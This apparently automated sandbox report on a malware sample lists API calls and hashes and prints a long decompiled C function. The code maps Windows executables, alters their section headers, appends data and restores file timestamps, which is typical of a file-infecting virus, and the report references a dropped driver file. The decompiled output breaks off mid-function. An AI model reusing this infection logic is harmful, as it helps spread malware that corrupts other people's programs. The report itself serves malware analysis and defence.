                                • GetTempPathA.KERNEL32(000000E4,C:\Windows\lvgdvj.log), ref: 022140FC
                                • lstrlen.KERNEL32(C:\Windows\lvgdvj.log), ref: 02214107
                                • lstrcat.KERNEL32(C:\Windows\lvgdvj.log,02203E30), ref: 02214123
                                • lstrcpy.KERNEL32(C:\Windows\lvgdvj.log,02202100), ref: 02214145
                                • lstrcpy.KERNEL32(C:\Windows\lvgdvj.log,C:\Windows\), ref: 02214157
                                • lstrlen.KERNEL32(?), ref: 0221417F
                                • lstrlen.KERNEL32(C:\Windows\lvgdvj.log), ref: 022141F4
                                • lstrcat.KERNEL32(C:\Windows\lvgdvj.log,0220266C), ref: 02214211
                                • CreateFileMappingA.KERNEL32(000000FF,00000000,?,00000000,00015400,02202370), ref: 0221422A
                                • lstrlen.KERNEL32(59814062956), ref: 02214357
                                • GetTickCount.KERNEL32 ref: 022143AA
                                • wsprintfA.USER32 ref: 022143BD
                                • lstrlen.KERNEL32(?,02203E34,?), ref: 02214474
                                • wsprintfA.USER32 ref: 02214482
                                • lstrcat.KERNEL32(?,0220226C), ref: 022144B8
                                • GetSystemDirectoryA.KERNEL32(C:\Windows\system32\drivers\rmhlrn.sys,00000080), ref: 022144C8
                                • lstrlen.KERNEL32(C:\Windows\system32\drivers\rmhlrn.sys), ref: 022144D3
                                • lstrcat.KERNEL32(C:\Windows\system32\drivers\rmhlrn.sys,02203E38), ref: 022144EF
                                • lstrcat.KERNEL32(C:\Windows\system32\drivers\rmhlrn.sys,02202288), ref: 02214501
                                • lstrcat.KERNEL32(C:\Windows\system32\drivers\rmhlrn.sys,?), ref: 02214513
                                • GlobalAlloc.KERNELBASE(00000040,00020000), ref: 02214520
                                • GlobalAlloc.KERNELBASE(00000040,00020000), ref: 02214532
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: lstrlen$lstrcat$AddressProcValuelstrcpy$Close$Open$Filewsprintf$Name$AllocCountCreateDirectoryGlobalLibraryLoadTick$ChangeComputerDeleteFindMappingModuleNotificationPathSystemTempUserWindows
                                • String ID: 59814062956$C:\Windows\lvgdvj.log$C:\Windows\system32\drivers\rmhlrn.sys$Software\$Software\Tebjlp$alfoC:\Windows\$n
                                • API String ID: 481992627-2677786918
                                • Opcode ID: c43bfb887c9ab37398a227855208b3726139d70a90176d28de04f12a7d892572
                                • Instruction ID: 4e4f5d0deea4047f608edee732baa70e6519831f975aef4ea62d2d9b8a0a754e
                                • Opcode Fuzzy Hash: c43bfb887c9ab37398a227855208b3726139d70a90176d28de04f12a7d892572
                                • Instruction Fuzzy Hash: B242B1B0990658EFEB24DBE0EC98FAB77F5AB58701F104599E20DAA184DB705ED0CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 88%
                                			E0220E329(void* __ecx, void* __eflags, char* _a4, signed int _a8, long* _a12) {
                                				int _v8;
                                				intOrPtr _v20;
                                				intOrPtr _v28;
                                				void* _v32;
                                				int _v36;
                                				int _v40;
                                				signed int _v44;
                                				int _v48;
                                				signed int _v52;
                                				void* _v56;
                                				signed int _v60;
                                				signed int _v62;
                                				signed int _v68;
                                				int _v76;
                                				signed int _v80;
                                				int _v84;
                                				signed int _v88;
                                				void _v95;
                                				char _v96;
                                				signed int _v100;
                                				signed int _v104;
                                				signed int _v108;
                                				signed int _v112;
                                				signed int _v116;
                                				int _v120;
                                				signed int _v124;
                                				signed int _v128;
                                				signed int _v132;
                                				signed int _v136;
                                				int _v140;
                                				signed int _v144;
                                				int _v148;
                                				signed int _v152;
                                				int _v156;
                                				int _v160;
                                				long _v164;
                                				void _v1202;
                                				short _v1204;
                                				struct _FILETIME _v1212;
                                				void* _v1216;
                                				signed int _v1220;
                                				signed int _v1224;
                                				void* _v1228;
                                				struct _FILETIME _v1236;
                                				int _v1240;
                                				int _v1244;
                                				long _v1248;
                                				void* _v1252;
                                				signed int _v1256;
                                				signed int _v1260;
                                				signed int _v1264;
                                				signed int _v1268;
                                				int _v1272;
                                				int _v1276;
                                				long _v1280;
                                				char _v5368;
                                				void _v5375;
                                				char _v5376;
                                				struct _SYSTEMTIME _v5392;
                                				signed int _v5396;
                                				signed int _v5400;
                                				signed int _v5404;
                                				int _v5408;
                                				signed int _v5412;
                                				signed int _v5416;
                                				signed int _v5420;
                                				int _v5488;
                                				signed int _v5492;
                                				int _v5564;
                                				intOrPtr _v5572;
                                				intOrPtr _v5592;
                                				intOrPtr _v5596;
                                				signed int _v5612;
                                				signed int _v5628;
                                				signed int _v5630;
                                				signed int _v5632;
                                				signed int _v5646;
                                				void _v5648;
                                				int _v5652;
                                				intOrPtr _v5656;
                                				signed int _v5660;
                                				signed int _v5664;
                                				void* _v5668;
                                				signed int _v5672;
                                				signed int _v5676;
                                				signed int _v5680;
                                				signed int _v5684;
                                				int _v5688;
                                				long _v5692;
                                				int _v5696;
                                				signed int _v5700;
                                				struct _FILETIME _v5708;
                                				int* _v5712;
                                				int _v5716;
                                				signed int _v5720;
                                				signed int _v5724;
                                				long _v5728;
                                				int _v5732;
                                				int _v5736;
                                				int _v5740;
                                				int _v5744;
                                				void* _v5748;
                                				signed int _v5752;
                                				signed int _v5756;
                                				signed int _v5760;
                                				signed int _v5764;
                                				int _v5768;
                                				signed int _v5772;
                                				signed int _v5776;
                                				signed int _v5780;
                                				void* _v5784;
                                				int _v5788;
                                				int _v5792;
                                				int _v5796;
                                				int _v5800;
                                				void _v5804;
                                				void _v5808;
                                				void _v5812;
                                				void _v5816;
                                				int _v5820;
                                				signed int _v5824;
                                				int _v5828;
                                				int _v5832;
                                				signed int _t1174;
                                				signed int _t1175;
                                				intOrPtr _t1189;
                                				void* _t1190;
                                				long _t1197;
                                				signed int _t1198;
                                				void* _t1200;
                                				signed int _t1207;
                                				void* _t1213;
                                				long _t1227;
                                				signed int _t1232;
                                				signed int _t1238;
                                				signed int _t1240;
                                				void* _t1246;
                                				signed int _t1252;
                                				int _t1264;
                                				int _t1266;
                                				signed int _t1269;
                                				signed int _t1281;
                                				intOrPtr _t1294;
                                				long _t1306;
                                				signed int _t1310;
                                				signed int _t1315;
                                				void* _t1319;
                                				void* _t1322;
                                				void* _t1326;
                                				signed int _t1328;
                                				signed int _t1332;
                                				void* _t1334;
                                				intOrPtr _t1341;
                                				void* _t1342;
                                				intOrPtr _t1344;
                                				intOrPtr _t1347;
                                				intOrPtr _t1349;
                                				signed int _t1358;
                                				intOrPtr _t1359;
                                				intOrPtr _t1362;
                                				signed int _t1369;
                                				signed int _t1372;
                                				intOrPtr _t1374;
                                				intOrPtr _t1377;
                                				signed int _t1383;
                                				signed int _t1387;
                                				signed int _t1398;
                                				signed int _t1422;
                                				signed int _t1425;
                                				void* _t1432;
                                				void* _t1437;
                                				void* _t1440;
                                				void* _t1443;
                                				void* _t1445;
                                				void* _t1448;
                                				signed int _t1449;
                                				void* _t1453;
                                				void* _t1455;
                                				void* _t1457;
                                				signed int _t1459;
                                				void* _t1460;
                                				void* _t1462;
                                				signed int _t1463;
                                				void* _t1465;
                                				signed int _t1466;
                                				signed int _t1467;
                                				signed int _t1469;
                                				signed int _t1471;
                                				signed int _t1472;
                                				signed int _t1477;
                                				void* _t1480;
                                				signed int _t1481;
                                				void* _t1483;
                                				signed int _t1486;
                                				signed int _t1488;
                                				signed int _t1491;
                                				signed int _t1492;
                                				signed int _t1493;
                                				signed int _t1496;
                                				signed int _t1498;
                                				signed int _t1502;
                                				void* _t1505;
                                				void* _t1509;
                                				void* _t1513;
                                				void* _t1514;
                                				void* _t1516;
                                				void* _t1519;
                                				int _t1522;
                                				signed int _t1524;
                                				int _t1525;
                                				int _t1526;
                                				void* _t1540;
                                				signed int _t1561;
                                				signed int _t1562;
                                				signed int _t1579;
                                				signed int _t1581;
                                				signed int _t1583;
                                				signed int _t1587;
                                				signed int _t1591;
                                				signed int _t1592;
                                				signed int _t1594;
                                				intOrPtr _t1615;
                                				long _t1631;
                                				signed int _t1636;
                                				signed int _t1637;
                                				signed int _t1640;
                                				void* _t1650;
                                				signed int _t1685;
                                				void* _t1691;
                                				signed int _t1710;
                                				signed int _t1713;
                                				intOrPtr _t1720;
                                				intOrPtr _t1722;
                                				intOrPtr _t1729;
                                				intOrPtr _t1742;
                                				signed int _t1752;
                                				intOrPtr _t1753;
                                				intOrPtr _t1769;
                                				signed int _t1772;
                                				signed int _t1782;
                                				signed int _t1790;
                                				int _t1798;
                                				void* _t1799;
                                				void* _t1800;
                                				signed int _t1824;
                                				int _t1848;
                                				int _t1851;
                                				signed int _t1856;
                                				int _t1877;
                                				int _t1878;
                                				intOrPtr _t1904;
                                				signed int _t1921;
                                				signed int _t1925;
                                				signed int _t1992;
                                				intOrPtr _t2002;
                                				intOrPtr _t2008;
                                				signed int _t2013;
                                				intOrPtr _t2014;
                                				intOrPtr _t2024;
                                				intOrPtr _t2041;
                                				signed int _t2057;
                                				signed int _t2066;
                                				signed int _t2082;
                                				void* _t2091;
                                				void* _t2092;
                                				void* _t2093;
                                				void* _t2095;
                                				void* _t2098;
                                				signed int _t2104;
                                				signed int _t2124;
                                				signed int _t2128;
                                				void* _t2130;
                                				void* _t2133;
                                				void* _t2136;
                                				int _t2144;
                                				signed int _t2168;
                                				signed int _t2173;
                                				signed int _t2180;
                                				signed int _t2197;
                                				void* _t2215;
                                				intOrPtr _t2216;
                                				intOrPtr _t2217;
                                				void* _t2222;
                                				void* _t2226;
                                				void* _t2228;
                                				void* _t2233;
                                				void* _t2234;
                                				void* _t2235;
                                				void* _t2236;
                                				void* _t2238;
                                				void* _t2241;
                                				void* _t2242;
                                				void* _t2243;
                                				void* _t2244;
                                				void* _t2245;
                                
                                				_t1601 = __ecx;
                                				_push(0xffffffff);
                                				_push(0x2203fd8);
                                				_push(0x2218090);
                                				 *[fs:0x0] = _t2216;
                                				_t2217 = _t2216 - 8;
                                				E02218060(0x16ac, __ecx,  *[fs:0x0]);
                                				_v28 = _t2217;
                                				_v5664 = 0;
                                				_v5720 = 0;
                                				_v1224 = 0;
                                				_v5744 = 0;
                                				_v5716 = 0;
                                				_v5408 = 0;
                                				_v5740 = 0;
                                				_v52 = 0;
                                				_v144 = 0;
                                				_v164 = 0;
                                				_v1248 = 0;
                                				_v5736 = 0;
                                				_v1244 = 0;
                                				_v48 = 0;
                                				_v160 = 0;
                                				_v1280 = 0;
                                				_v1220 = 0x10000;
                                				_v5728 = 0;
                                				_v5692 = 0;
                                				_v44 = 0;
                                				_v40 = 0;
                                				_v5404 = 0;
                                				_v5400 = 0;
                                				_v5396 = 0;
                                				_v156 = 0;
                                				_v5724 = 0;
                                				_t1174 = E022044CB(_t1601) & 0xff;
                                				if(_t1174 < 0) {
                                					_t1174 = (_t1174 - 0x00000001 | 0xffffff00) + 1;
                                				}
                                				_v1276 = _t1174;
                                				_v5412 = 0;
                                				_v5660 = 0;
                                				_v5772 = 0x1f4;
                                				_v36 = 0;
                                				_t1175 = E022044CB(_t1601);
                                				asm("cdq");
                                				_v5656 = (_t1175 & 0x0000ffff) % 0xfffe + 0x64;
                                				_v140 = 0;
                                				_v136 = 0;
                                				_v132 = 0;
                                				_v128 = 0;
                                				_v124 = 0;
                                				_v5688 = 0;
                                				_v5684 = 0;
                                				_v5680 = 0;
                                				_v5676 = 0;
                                				_v5672 = 0;
                                				_v120 = 0;
                                				_v116 = 0;
                                				_v112 = 0;
                                				_v108 = 0;
                                				_v104 = 0;
                                				_v1272 = 0;
                                				_v1268 = 0;
                                				_v1264 = 0;
                                				_v1260 = 0;
                                				_v1256 = 0;
                                				_v5768 = 0;
                                				_v5764 = 0;
                                				_v5760 = 0;
                                				_v5756 = 0;
                                				_v5752 = 0;
                                				_v100 = 0;
                                				_v96 = 0;
                                				memset( &_v95, 0, 9 << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v1240 = 0;
                                				_v5652 = 0;
                                				memset( &_v5648, 0, 0x3b << 2);
                                				_v5712 =  &_v5652;
                                				_v56 = 0;
                                				_v32 = 0;
                                				_v1216 = 0;
                                				_v1212.dwLowDateTime = 0;
                                				_v1212.dwHighDateTime = 0;
                                				_v1236.dwLowDateTime = 0;
                                				_v1236.dwHighDateTime = 0;
                                				_v5708.dwLowDateTime = 0;
                                				_v5708.dwHighDateTime = 0;
                                				_v152 = 0;
                                				_v5700 = 0;
                                				_v1204 = 0;
                                				memset( &_v1202, 0, 0x103 << 2);
                                				asm("stosw");
                                				_v5392.wYear = 0;
                                				_v5392.wMonth = 0;
                                				_v5392.wDay = 0;
                                				_v5392.wMinute = 0;
                                				_v5392.wMilliseconds = 0;
                                				_v5376 = 0;
                                				memset( &_v5375, 0, 0x3ff << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v148 = 0;
                                				_v5748 = 0;
                                				_v1228 = 0;
                                				_v5668 = 0;
                                				_v5732 = 0;
                                				_v5696 = 0;
                                				_v1252 = 0;
                                				_t1189 =  *0x21e1734; // 0x2202518
                                				_t1190 = E02208DEB(_a4, _t1189);
                                				_t2222 = _t2217 + 0x38;
                                				if(_t1190 == 0) {
                                					__eflags = _a8;
                                					if(_a8 != 0) {
                                						L11:
                                						__eflags =  *0x2219000;
                                						if( *0x2219000 == 0) {
                                							L14:
                                							 *0x21e1174(0x2219018);
                                							_v8 = 0;
                                							_t1615 =  *0x22190a4; // 0x4d9070
                                							E02204060(_t1615, 0, 0x10000);
                                							_t1904 =  *0x2219004; // 0x4f9078
                                							E02204060(_t1904, 0, 0x10000);
                                							E02204060(0x228abf0, 0, 0x2850);
                                							E02204060(E0228D440, 0, 0x320);
                                							_t2226 = _t2222 + 0x30;
                                							GetLocalTime( &_v5392);
                                							_t1197 = GetFileAttributesA(_a4); // executed
                                							_v164 = _t1197;
                                							_t1198 = SetFileAttributesA(_a4, 0x20); // executed
                                							__eflags = _t1198;
                                							if(_t1198 != 0) {
                                								_t1200 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0x80, 0); // executed
                                								_v1252 = _t1200;
                                								__eflags = _v1252 - 0xffffffff;
                                								if(_v1252 != 0xffffffff) {
                                									_v1248 = GetFileSize(_v1252, 0);
                                								}
                                								__eflags = _v1252 - 0xffffffff;
                                								if(_v1252 == 0xffffffff) {
                                									L337:
                                									FindCloseChangeNotification(_v1252); // executed
                                									SetFileAttributesA(_a4, _v164); // executed
                                									__eflags = _a8 - 1;
                                									if(_a8 == 1) {
                                										L339:
                                										DeleteFileA(_a4); // executed
                                										L340:
                                										_v8 = 0xffffffff;
                                										goto L341;
                                									}
                                									__eflags = _a8 - 3;
                                									if(_a8 != 3) {
                                										goto L340;
                                									}
                                									goto L339;
                                								}
                                								__eflags = _v1248 - 0x2800000;
                                								if(_v1248 >= 0x2800000) {
                                									goto L337;
                                								}
                                								__eflags = _v1248 - 0x200;
                                								if(_v1248 <= 0x200) {
                                									goto L337;
                                								}
                                								_v1280 = _v1248;
                                								GetFileTime(_v1252,  &_v1212,  &_v1236,  &_v5708);
                                								_t1213 = CreateFileMappingA(_v1252, 0, "true", 0, _v1248 + 0x110000, 0); // executed
                                								_v1216 = _t1213;
                                								__eflags = _v1216;
                                								if(_v1216 == 0) {
                                									L302:
                                									__eflags = _v56;
                                									if(_v56 == 0) {
                                										L330:
                                										FindCloseChangeNotification(_v1216); // executed
                                										__eflags = _v1280;
                                										if(_v1280 != 0) {
                                											SetFilePointer(_v1252, _v1280, 0, 0); // executed
                                											SetEndOfFile(_v1252); // executed
                                											__eflags = (_v5700 & 0x000000ff) - 1;
                                											if((_v5700 & 0x000000ff) == 1) {
                                												__eflags = _v32;
                                												if(_v32 != 0) {
                                													WriteFile(_v1252, _v32, _v5692,  &_v5728, 0); // executed
                                												}
                                											}
                                											__eflags = _v32;
                                											if(_v32 != 0) {
                                												GlobalFree(_v32);
                                												_v32 = 0;
                                											}
                                											SetFileTime(_v1252,  &_v1212,  &_v1236,  &_v5708); // executed
                                										}
                                										goto L337;
                                									}
                                									__eflags = _v5700 & 0x000000ff;
                                									if((_v5700 & 0x000000ff) != 0) {
                                										__eflags = _a8 - 1;
                                										if(_a8 == 1) {
                                											L327:
                                											__eflags = _a12;
                                											if(_a12 != 0) {
                                												_t1631 = _v1248 + 0x17fff;
                                												__eflags = _t1631;
                                												 *_a12 = _t1631;
                                												_t1227 = GlobalAlloc(0x40,  *_a12); // executed
                                												_a12[1] = _t1227;
                                												E0221772B(_a12[1], _v56,  *_a12);
                                											}
                                											L329:
                                											UnmapViewOfFile(_v56);
                                											goto L330;
                                										}
                                										__eflags = _a8 - 3;
                                										if(_a8 != 3) {
                                											goto L329;
                                										}
                                										goto L327;
                                									}
                                									_v1280 = _v1248;
                                									__eflags =  *0x228abf0;
                                									if( *0x228abf0 <= 0) {
                                										L315:
                                										__eflags =  *E0228D440;
                                										if( *E0228D440 <= 0) {
                                											L324:
                                											goto L329;
                                										}
                                										_v5728 = 0;
                                										while(1) {
                                											__eflags = _v5728 - 0x64;
                                											if(_v5728 >= 0x64) {
                                												goto L324;
                                											}
                                											_t1921 = _v5728;
                                											__eflags =  *(E0228D440 + _t1921 * 8);
                                											if( *(E0228D440 + _t1921 * 8) <= 0) {
                                												goto L324;
                                											}
                                											_t1232 = _v5728;
                                											__eflags =  *(E0228D440 + _t1232 * 8);
                                											if( *(E0228D440 + _t1232 * 8) > 0) {
                                												_t1637 = _v5728;
                                												__eflags =  *((intOrPtr*)(E0228D440 + _t1637 * 8)) - _v1280;
                                												if( *((intOrPtr*)(E0228D440 + _t1637 * 8)) <= _v1280) {
                                													__eflags = _v56 +  *((intOrPtr*)(E0228D440 + _v5728 * 8));
                                													E0221772B(_v56 +  *((intOrPtr*)(E0228D440 + _v5728 * 8)), 0x228d444 + _v5728 * 8, "true");
                                													_t2226 = _t2226 + 0xc;
                                												}
                                											}
                                											_t1636 = _v5728 + 1;
                                											__eflags = _t1636;
                                											_v5728 = _t1636;
                                										}
                                										goto L324;
                                									}
                                									_v5728 = 0;
                                									while(1) {
                                										__eflags = _v5728 - 0xa;
                                										if(_v5728 >= 0xa) {
                                											goto L315;
                                										}
                                										_t1925 = _v5728 * 0x408;
                                										__eflags =  *(0x228abf0 + _t1925);
                                										if( *(0x228abf0 + _t1925) <= 0) {
                                											goto L315;
                                										}
                                										_t1238 = _v5728 * 0x408;
                                										__eflags =  *(0x228abf0 + _t1238);
                                										if( *(0x228abf0 + _t1238) > 0) {
                                											_t1093 = 0x228abf0 + _v5728 * 0x408; // 0x747865
                                											__eflags =  *_t1093 - _v1280;
                                											if( *_t1093 <= _v1280) {
                                												_t1240 = _v5728 * 0x408;
                                												__eflags =  *(_t1240 + 0x228abf4);
                                												if( *(_t1240 + 0x228abf4) > 0) {
                                													__eflags = 0x228abf8 + _v5728 * 0x408;
                                													if(0x228abf8 + _v5728 * 0x408 != 0) {
                                														_t1099 = 0x228abf4 + _v5728 * 0x408; // 0xfc0000
                                														_t1103 = 0x228abf0 + _v5728 * 0x408; // 0x747865
                                														__eflags = _v56 +  *_t1103;
                                														E0221772B(_v56 +  *_t1103, 0x228abf8 + _v5728 * 0x408,  *_t1099);
                                														_t2226 = _t2226 + 0xc;
                                													}
                                												}
                                											}
                                										}
                                										_t1640 = _v5728 + 1;
                                										__eflags = _t1640;
                                										_v5728 = _t1640;
                                									}
                                									goto L315;
                                								}
                                								_t1246 = MapViewOfFile(_v1216, 6, 0, 0, 0); // executed
                                								_v56 = _t1246;
                                								__eflags = _v56;
                                								if(_v56 == 0) {
                                									goto L302;
                                								}
                                								_v5736 =  *((intOrPtr*)(_v56 + 0x3c));
                                								__eflags = _v5736 - _v1248;
                                								if(_v5736 >= _v1248) {
                                									goto L302;
                                								}
                                								_t1650 = _v56;
                                								__eflags =  *((char*)(_t1650 + 0x18)) - 0x40;
                                								if( *((char*)(_t1650 + 0x18)) < 0x40) {
                                									goto L302;
                                								}
                                								_t1651 =  &_v5652;
                                								E0221772B( &_v5652, _v56 + _v5736, 0xf0);
                                								_t2226 = _t2226 + 0xc;
                                								__eflags = _v5652 - 0x4550;
                                								if(_v5652 != 0x4550) {
                                									goto L302;
                                								}
                                								__eflags = _v5612;
                                								if(_v5612 == 0) {
                                									goto L302;
                                								}
                                								__eflags = (_v5646 & 0x0000ffff) - 0xf;
                                								if((_v5646 & 0x0000ffff) >= 0xf) {
                                									goto L302;
                                								}
                                								__eflags = _v5420;
                                								if(_v5420 != 0) {
                                									goto L302;
                                								}
                                								__eflags = _v5416;
                                								if(_v5416 != 0) {
                                									goto L302;
                                								}
                                								__eflags = _v5596 - 0x5000;
                                								if(_v5596 >= 0x5000) {
                                									goto L302;
                                								}
                                								__eflags = _a8;
                                								if(_a8 == 0) {
                                									_t1581 = E022044CB( &_v5652) & 0x0000ffff;
                                									asm("cdq");
                                									_t1651 = 0x64;
                                									__eflags = _t1581 % 0x64 - 0x1e;
                                									if(_t1581 % 0x64 > 0x1e) {
                                										__eflags = _v5596 - 0x1000;
                                										if(_v5596 <= 0x1000) {
                                											_t1583 = E022044CB(0x64);
                                											asm("cdq");
                                											_v44 = (_t1583 & 0x0000ffff) % 0x2710;
                                											_t1587 = E0220C868(0x2710, _v44, _v5596);
                                											_t2226 = _t2226 + 8;
                                											_v44 = _t1587;
                                											_t1651 = _v1220 + _v44;
                                											__eflags = _t1651;
                                											_v1220 = _t1651;
                                										}
                                									}
                                								}
                                								_t1252 = E0220C868(_t1651, _v1220, _v5596);
                                								_t2226 = _t2226 + 8;
                                								_v1220 = _t1252;
                                								_v5720 = 0;
                                								_v5664 = _v5720;
                                								while(1) {
                                									__eflags = _v5720 - (_v5646 & 0x0000ffff) - 1;
                                									if(_v5720 > (_v5646 & 0x0000ffff) - 1) {
                                										break;
                                									}
                                									_t193 = _v5736 + (_v5632 & 0x0000ffff) + 0x18; // 0x18
                                									E0221772B( &_v96, _v56 + _v5720 * 0x28 + _t193, 0x28);
                                									_t2226 = _t2226 + 0xc;
                                									__eflags = _v5740 - _v84;
                                									if(_v5740 <= _v84) {
                                										_v5740 = _v84;
                                										_v144 = _v5720;
                                									}
                                									__eflags = _v5408 - _v76;
                                									if(_v5408 <= _v76) {
                                										_v5408 = _v76;
                                										_v52 = _v5720;
                                									}
                                									__eflags = _v80;
                                									if(_v80 == 0) {
                                										L44:
                                										goto L36;
                                									} else {
                                										__eflags = _v88;
                                										if(_v88 != 0) {
                                											__eflags = _v5612 - _v84;
                                											if(_v5612 < _v84) {
                                												L53:
                                												L36:
                                												_t2180 = _v5720 + 1;
                                												__eflags = _t2180;
                                												_v5720 = _t2180;
                                												continue;
                                											}
                                											__eflags = _v5612 - _v84 + _v88;
                                											if(_v5612 >= _v84 + _v88) {
                                												goto L53;
                                											}
                                											_v5716 = _v5612 - _v84 + _v76;
                                											__eflags = _v84 + _v88 - _v5612 - _v84 + _v80 - _v5612;
                                											if(_v84 + _v88 - _v5612 >= _v84 + _v80 - _v5612) {
                                												_t1579 = _v84 + _v80 - _v5612;
                                												__eflags = _t1579;
                                												_v5776 = _t1579;
                                											} else {
                                												_v5776 = _v84 + _v88 - _v5612;
                                											}
                                											_v5772 = _v5776;
                                											__eflags = _v5772 - 0x32;
                                											if(_v5772 >= 0x32) {
                                												_v5664 = _v5720;
                                												goto L53;
                                											} else {
                                												goto L302;
                                											}
                                										}
                                										goto L44;
                                									}
                                								}
                                								__eflags = _a8 - 2;
                                								if(_a8 != 2) {
                                									_v5696 = _v56 + _v5736;
                                									__eflags = _v5772 - 0x1f4;
                                									if(_v5772 > 0x1f4) {
                                										_v5772 = 0x1f4;
                                									}
                                									_v5412 = 0;
                                									while(1) {
                                										__eflags = _v5412 - 0x10;
                                										if(_v5412 == 0x10) {
                                											break;
                                										}
                                										_t1561 = _v5412;
                                										_t1877 = _v5696;
                                										__eflags =  *((intOrPtr*)(_t1877 + 0x78 + _t1561 * 8)) - _v5612;
                                										if( *((intOrPtr*)(_t1877 + 0x78 + _t1561 * 8)) > _v5612) {
                                											_t1562 = _v5412;
                                											_t1878 = _v5696;
                                											__eflags =  *((intOrPtr*)(_t1878 + 0x78 + _t1562 * 8)) - _v5612 - _v5772;
                                											if( *((intOrPtr*)(_t1878 + 0x78 + _t1562 * 8)) - _v5612 < _v5772) {
                                												_t2173 =  *((intOrPtr*)(_v5696 + 0x78 + _v5412 * 8)) - _v5612 - 1;
                                												__eflags = _t2173;
                                												_v5772 = _t2173;
                                											}
                                										}
                                										_t2168 = _v5412 + 1;
                                										__eflags = _t2168;
                                										_v5412 = _t2168;
                                									}
                                									_t281 = _v5736 + (_v5632 & 0x0000ffff) + 0x18; // 0x18
                                									E0221772B( &_v96, _v56 + _v52 * 0x28 + _t281, 0x28);
                                									_t2226 = _t2226 + 0xc;
                                									__eflags = (_v5628 & 0x0000ffff) - 0x10b;
                                									if((_v5628 & 0x0000ffff) != 0x10b) {
                                										L73:
                                										goto L302;
                                									}
                                									__eflags = _v80;
                                									if(_v80 != 0) {
                                										L68:
                                										__eflags = _v62 & 0x0000ffff;
                                										if((_v62 & 0x0000ffff) != 0) {
                                											goto L73;
                                										}
                                										__eflags = _v68;
                                										if(_v68 != 0) {
                                											goto L73;
                                										}
                                										_t1659 = _v56 + _v5716;
                                										__eflags =  *(_v56 + _v5716) - 0x60;
                                										if( *(_v56 + _v5716) != 0x60) {
                                											L74:
                                											_t1264 = E0220C868(_t1659, _v76 + _v80, _v5592);
                                											_t2228 = _t2226 + 8;
                                											_v1244 = _t1264;
                                											__eflags = _v80 - _v88;
                                											if(_v80 <= _v88) {
                                												_v5780 = _v88;
                                											} else {
                                												_v5780 = _v80;
                                											}
                                											_t1266 = E0220C868(_v5592, _v76 + _v5780, _v5592);
                                											_t2226 = _t2228 + 8;
                                											_v48 = _t1266;
                                											_t1662 =  &_v5376;
                                											 *0x21e1064( &_v5376,  &_v96, 8);
                                											_v5368 = 0;
                                											_t1269 =  *0x21e10b0( &_v5376, ".adata"); // executed
                                											__eflags = _t1269;
                                											if(_t1269 != 0) {
                                												L80:
                                												__eflags = _v5564;
                                												if(_v5564 != 0) {
                                													_t1662 = _v5736 + 0x58;
                                													__eflags = _v5736 + 0x58;
                                													E0220C9C6(_v5736 + 0x58, E0228D440, _v5736 + 0x58, _v5564);
                                													_t2226 = _t2226 + 0xc;
                                												}
                                												_v5564 = 0;
                                												__eflags = _v5492;
                                												if(_v5492 != 0) {
                                													E0220C9C6(_t1662, E0228D440, _v5736 + 0xa0, _v5492);
                                													E0220C9C6(_v5488, E0228D440, _v5736 + 0xa4, _v5488);
                                													_t2226 = _t2226 + 0x18;
                                													_v5488 = 0;
                                													_v5492 = _v5488;
                                													_t1662 = _v5630 & 1;
                                													__eflags = _v5630 & 1;
                                													if((_v5630 & 1) == 0) {
                                														E0220C9C6(_t1662, E0228D440, _v5736 + 0x16, _v5630 & 0x0000ffff);
                                														_t2226 = _t2226 + 0xc;
                                														_t1662 = _v5630 | 0x00000001;
                                														__eflags = _t1662;
                                														_v5630 = _t1662;
                                													}
                                												}
                                												E0220C9C6(_t1662, E0228D440, _v5736 + 0x50, _v5572);
                                												_t2226 = _t2226 + 0xc;
                                												__eflags = _v52 - _v144;
                                												if(_v52 != _v144) {
                                													goto L302;
                                												} else {
                                													__eflags = _v1244 - _v1248;
                                													if(_v1244 != _v1248) {
                                														_v5692 = _v1248 - _v1244;
                                														__eflags = _v5692;
                                														if(_v5692 > 0) {
                                															_v32 = GlobalAlloc(0x40, _v5692 + 0x400);
                                															__eflags = _v56 + _v1244;
                                															E0221772B(_v32, _v56 + _v1244, _v5692);
                                															_t2226 = _t2226 + 0xc;
                                														}
                                													}
                                													__eflags = _v88 - _v80;
                                													if(_v88 <= _v80) {
                                														_v5784 = _v80;
                                													} else {
                                														_v5784 = _v88;
                                													}
                                													_v36 = _v5784;
                                													_v88 = _v36 + _v1220;
                                													_v88 = E0220C868(_v5596, _v88, _v5596);
                                													_v80 = _v36 + _v1220;
                                													_v80 = E0220C868(_v5592, _v80, _v5592);
                                													_v60 = _v60 | 0xe0000000;
                                													_t1281 = E022044CB(_v5592);
                                													asm("cdq");
                                													_v62 = (_t1281 & 0x0000ffff) % 0x64 + 0xa;
                                													_t376 = _v5736 + (_v5632 & 0x0000ffff) + 0x18; // 0x18
                                													E0220C943(_v5736 + (_v5632 & 0x0000ffff), 0x228abf0, _v5736 + (_v5632 & 0x0000ffff) + 0x18 + _v52 * 0x28, 0x28, _v56 + _v52 * 0x28 + _t376);
                                													_t388 = _v5736 + (_v5632 & 0x0000ffff) + 0x18; // 0x18
                                													E0221772B(_v56 + _v52 * 0x28 + _t388,  &_v96, 0x28);
                                													_t1294 = E0220C868(_v84 + _v88, _v84 + _v88, _v5596);
                                													_t2226 = _t2226 + 0x34;
                                													_v5572 = _t1294;
                                													_v1224 = _v84 + _v80 - _v1220 - _v5612;
                                													_v152 = 1;
                                													__eflags = _v152 & 0x000000ff;
                                													if((_v152 & 0x000000ff) == 0) {
                                														goto L302;
                                													} else {
                                														_t405 = _v5736 + (_v5632 & 0x0000ffff) + 0x18; // 0x18
                                														E0221772B( &_v96, _v56 + _v5664 * 0x28 + _t405, 0x28);
